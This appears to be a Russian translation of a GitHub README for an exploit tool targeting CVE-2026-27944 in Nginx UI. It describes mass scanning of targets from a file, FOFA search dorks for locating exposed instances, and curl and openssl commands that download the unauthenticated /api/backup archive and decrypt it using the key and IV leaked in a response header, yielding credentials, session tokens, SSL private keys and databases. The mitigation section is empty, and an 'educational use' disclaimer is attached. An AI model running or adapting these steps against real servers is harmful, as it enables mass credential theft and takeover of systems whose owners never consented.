
Как хочешь.
🚀 CVE-2026-27944: Эксплойт для неавторизованного резервного копирования Nginx UI
📌 Описание
27944.py — это инструмент эксплуатации для CVE-2026-27944, позволяющий злоумышленнику загружать и расшифровывать резервные копии Nginx UI без аутентификации.
Уязвимость присутствует в Nginx UI версии < 2.3.2 и предоставляет доступ к:
· Учетным данным пользователей и токенам сессий · Закрытым ключам SSL · Конфигурации Nginx · Файлам базы данных
🔧 Функции
· ✅ Массовое сканирование из файла целей · ✅ Эксплуатация одиночной цели · ✅ Автоматическая загрузка резервной копии · ✅ Автоматическое дешифрование AES-256-CBC · ✅ Автоматическое извлечение учетных данных из резервной копии
🛠️ Установка
git clone https://github.com/bimabalance/CVE-2026-27944.git
cd CVE-2026-27944
pip install -r requirements.txt
🚀 Использование
python 27944.py -f targets.txt -o hasil_scan
python 27944.py -t target.com:9000 --exploit --decrypt
python 27944.py -f targets.txt --exploit --decrypt -o hasil_full
📋 Формат целей
target1.com:9000
192.168.1.1:9000
target2.com:8080
🎯 Dork FOFA
title="Nginx UI"
icon_hash="-1565173320"
header="X-Backup-Security"
body="Nginx UI" && port="9000"
title="Nginx UI" && country="ID"
📂 Результаты вывода
results/
├── results.json
├── target_backup.bin
├── target_backup_decrypted.zip
└── target_extracted/
├── app.ini
├── database.db
├── nginx.conf
└── ssl/
⚠️ Отказ от ответственности
Этот инструмент создан в образовательных целях и для тестирования безопасности в этичном контексте. Автор не несет ответственности за неправомерное использование данного инструмента. Используйте только на системах, которыми вы владеете или на тестирование которых имеете письменное разрешение.
📝 Технические пояснения
CVE-2026-27944 — критическая уязвимость в Nginx UI, позволяющая злоумышленнику получить доступ к конечной точке /api/backup без аутентификации. Резервная копия содержит конфиденциальные данные, зашифрованные с помощью AES-256, однако ключ и вектор инициализации передаются в заголовке X-Backup-Security в формате Base64.
Оценка CVSS: 9.8 (критическая)
Затрагиваемые версии: Nginx UI < 2.3.2
Способы смягчения:
💀 POC
# Проверка уязвимости
curl -I http://target:9000/api/backup
# Загрузка резервной копии
curl -s http://target:9000/api/backup -o backup.bin
# Расшифровка резервной копии (вручную)
openssl enc -d -aes-256-cbc -base64 -K <key> -iv <iv> -in backup.bin -out backup_decrypted.zip